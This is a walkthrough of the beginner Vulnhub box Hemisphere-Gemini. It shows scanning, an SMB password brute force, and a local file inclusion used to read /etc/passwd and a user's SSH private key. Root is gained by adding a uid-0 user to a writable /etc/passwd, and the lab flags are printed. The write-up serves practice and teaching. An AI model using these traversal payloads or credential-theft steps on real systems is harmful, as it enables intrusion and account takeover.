Vulnhub: Hemisphere-Gemini

This is a beginner-level box from Vulnhub. It has custom exploitation, and a privilege escalation vector I hadn’t seen before.

Scanning:

Find the machine on the network:

crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
    
Nmap scan report for 192.168.56.136
Host is up (0.00028s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Get more details about running services, only important detail found is hostname gemini:

crazyeights@es-base:~$ nmap -A -p- 192.168.56.136
[SNIP]

Web:

Index Page:

The message Translated:

> Website in maintenance, we are working to make it available as soon as possible ... Sorry for the inconvenience.

Perform enumeration to search for additional files and directories:

crazyeights@es-base:~$ dirb http://192.168.56.136   

Only interesting file found is robots.txt which contains 3 entries. None of these actually exist though so this is a dead end.

crazyeights@es-base:~$ curl http://192.168.56.136/robots.txt
/secret
/admin
/lol

SMB:

Checking out smb, hoping to find additonal files or info. Listing available shares:

crazyeights@es-base:~$ smbclient -L //gemini -I 192.168.56.136 -N
    
    	Sharename       Type      Comment
    	---------       ----      -------
    	print$          Disk      Printer Drivers
    	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
    SMB1 disabled -- no workgroup available
crazyeights@es-base:~$ 

There is none, so this is also a dead end.

Using enum4linux to search for users, we find one Local User william:

S-1-22-1-1000 Unix User\william (Local User)

Using the module smb_login we are able to retrieve the password for the user william, but this password does not get us any additional access/info so this is also a dead end:

msf5 auxiliary(scanner/smb/smb_login) > set SMBUser william
SMBUser => william
msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE lists/rockyou-40.txt
PASS_FILE => lists/rockyou-40.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.56.136
RHOSTS => 192.168.56.136
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain gemini
SMBDomain => gemini
msf5 auxiliary(scanner/smb/smb_login) > exploit
    
[*] 192.168.56.136:445    - 192.168.56.136:445 - Starting SMB login bruteforce
[+] 192.168.56.136:445    - 192.168.56.136:445 - Success: 'gemini\william:123456'
[!] 192.168.56.136:445    - No active DB -- Credential data will not be saved!
[*] 192.168.56.136:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) > 

Back to Web:

With further enumeration we find an additional folder we missed:

crazyeights@es-base:~$ dirb http://192.168.56.136 lists/dirb/directory-list-2.3-small.txt
                                
==> DIRECTORY: http://192.168.56.136/Portal/ 

In the portal folder, there is a webapp

Pages in the webapp are retrieved as shown below, meaning the index.php may be vulnerable to LFI (Local File Inclusion):

http://192.168.56.136/Portal/index.php?view=about-us.html

Testing it out by trying to retrieve passwd:

crazyeights@es-base:~$ curl http://192.168.56.136/Portal/index.php?view=../../../../../etc/passwd
<html>
    [SNIP]
    <p>root:x:0:0:root:/root:/bin/bash
    [SNIP]
    messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
    sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
    william:x:1000:1000:william,,,:/home/william:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    ftp:x:106:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
</p>    </body>
</html>
crazyeights@es-base:~$ 

There is one local user william. We check william for .ssh folder:

crazyeights@es-base:~$ curl http://192.168.56.136/Portal/index.php?view=../../../../../home/william/.ssh/authorized_keys

We can retrieve william’s private key which will allow us to login as william via SSH

crazyeights@es-base:~$ curl http://192.168.56.136/Portal/index.php?view=../../../../../home/william/.ssh/id_rsa

User:

After changing the permissions of the file containing the private key we can login as william:

crazyeights@es-base:~$ chmod 0600 id_rsa_gem 
crazyeights@es-base:~$ ssh -i id_rsa_gem william@192.168.56.136
Linux gemini 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

Getting user flag:

william@gemini:~$ ls
Desktop  Documents  Downloads  Music  Public  user.txt  Videos
william@gemini:~$ cat user.txt
[SNIP]
user_flag==> srLbBhLRK7nBdZAesnxyeWaMV

Root:

Finding programs william can run as another user:

william@gemini:~$ find / -perm /4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/su
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/etc/passwd

The entry /etc/passwd is interesting because it means that william can write to it We can use it to create a new user that has uid root.

william@gemini:~$ ls -lia /etc/passwd
138596 -rwsrwsrwx 1 root root 1456 nov  6 15:09 /etc/passwd
william@gemini:~$ 

Create a password for the new user (password is root):

crazyeights@es-base:~$ openssl passwd -1
Password: 
Verifying - Password: 
$1$vYYRevCu$6uUg5FbiK3e2vNVGiSDG61

Add the following line (used nano):

rooter:$1$vYYRevCu$6uUg5FbiK3e2vNVGiSDG61:0:0:rooter:/root:/bin/sh

Login as user rooter:

william@gemini:~$ su rooter
Contraseña: 
# id
uid=0(root) gid=0(root) grupos=0(root)

We now have root privileges, so we can get the root flag

# cd /root
# ls
root.txt
# cat root.txt
[SNIP]
root_flag==> vD1JA8mze74XzkmzOA21R4sjZ

FIN.